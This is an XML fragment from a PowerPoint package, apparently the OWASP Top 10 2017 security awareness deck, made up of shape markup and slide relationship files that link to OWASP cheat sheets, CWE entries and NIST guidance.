              <a:noFill/>
              <a:ln w="38100">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:prstDash val="sysDot"/>
                <a:miter lim="800000"/>
                <a:headEnd type="oval" w="sm" len="sm"/>
                <a:tailEnd type="oval" w="sm" len="sm"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879480" y="1067053"/>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a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2861647" y="1211643"/>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AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="18" idx="3"/>
              <a:endCxn id="21" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3899845" y="1251307"/>
              <a:ext cx="1586555" cy="727"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1512606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5257800" y="8657167"/>
            <a:ext cx="1600200" cy="486833"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1000" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{3201FDD2-27F9-4966-B34E-DF3AF7EF073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7" r:id="rId2"/>
    <p:sldLayoutId id="2147483658" r:id="rId3"/>
    <p:sldLayoutId id="2147483655" r:id="rId4"/>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hyperlink" Target="http://creativecommons.org/licenses/by-sa/4.0/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://creativecommons.org/licenses/by-sa/4.0/" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide10.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://&#160;Authentication" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Credential_Stuffing_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pages.nist.gov/800-63-3/sp800-63b.html#memsecret" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide8.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet#Leverage_an_adaptive_one-way_function" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#5:_Implement_Identity_and_Authentication_Controls" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Authentication_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Session_Management_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/384.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag8.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cynosureprime.blogspot.com.au/2017/08/320-million-hashes-exposed.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_authentication" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecLists" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_Identity_Management" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/287.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Credential_stuffing" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project#tab=Home" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Forgot_Password_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/danielmiessler/SecLists/tree/master/Passwords"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www.owasp.org/index.php/User_Privacy_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/312.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide9.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cryptolux.org/index.php/Argon2" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_weak_Cryptography" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/326.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/310.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://csrc.nist.gov/groups/STM/cmvp/documents/140-1/140val-all.htm" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag9.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Headers_Project" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/PBKDF2" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#7:_Protect_Data" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/202.html" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Bcrypt" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/319.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/359.html" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Scrypt"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www.owasp.org/index.php/Testing_for_XML_Injection_(OTG-INPVAL-008)" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Billion_laughs_attack" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide10.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project#tab=Home" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/611.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storage" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_Security_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Document_type_definition" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing"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www.owasp.org/index.php/Access_Control_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide11.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Authorization" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/639.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag11.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project#tab=Home" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/285.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#6:_Implement_Access_Controls" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/284.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storage" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/22.html"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www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide12.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Error_Code_(OWASP-IG-006)" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag12.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_configuration_management" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://benchmarks.cisecurity.org/downloads/benchmarks/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Top_10_2007-Insecure_Cryptographic_Storage" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/2.html" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/HTTP_Strict_Transport_Security_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-123.pdf"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www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide13.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OTG-INPVAL-001)" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag13.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#tab=OWASP_Proactive_Controls_2016" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/knowledgebase/issues/details/00200308_clientsidetemplateinjection" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Content_Security_Policy" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_(OTG-CLIENT-001)" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/79.html"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www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide14.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.slideshare.net/cschneider4711/surviving-the-java-deserialization-apocalypse-owasp-appseceu-2016" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag14.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project#tab=Home" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mbechler/marshalsec" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#4:_Validate_All_Inputs" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Deserialization_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/502.html"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en.wikipedia.org/wiki/Heartbleed" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cvedetails.com/version-search.php" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.mojohaus.org/versions-maven-plugin/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide15.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.shodan.io/report/89bnfUyJ" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.aspectsecurity.com/research-presentations/the-unfortunate-reality-of-insecure-libraries" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rubysec.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nodesecurity.io/advisories" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Virtual_Patching_Best_Practices#What_is_a_Virtual_Patch.3F" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.zdnet.com/article/fda-forces-st-jude-pacemaker-recall-to-patch-security-vulnerabilities/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Virtual_Patching_Best_Practices" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Internet_of_things" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/retirejs/retire.js/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Dependency_Check" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/"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cwe.mitre.org/data/definitions/223.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.elastic.co/products" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide16.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag16.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Logging_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_AppSensor_Project" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project#tab=Home" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/publications/detail/sp/800-61/rev-2/final" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#8:_Implement_Logging_and_Intrusion_Detection" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/778.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html"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s://www.owasp.org/index.php/OWASP_Secure_Software_Contract_Annex" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/WebGoat" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_AppSec_Conference" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide17.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Education_Project" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Juice_Shop_Project" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://stores.lulu.com/owasp" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Node_js_Goat_Project" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Guide_Project" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Chapter" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Projects" 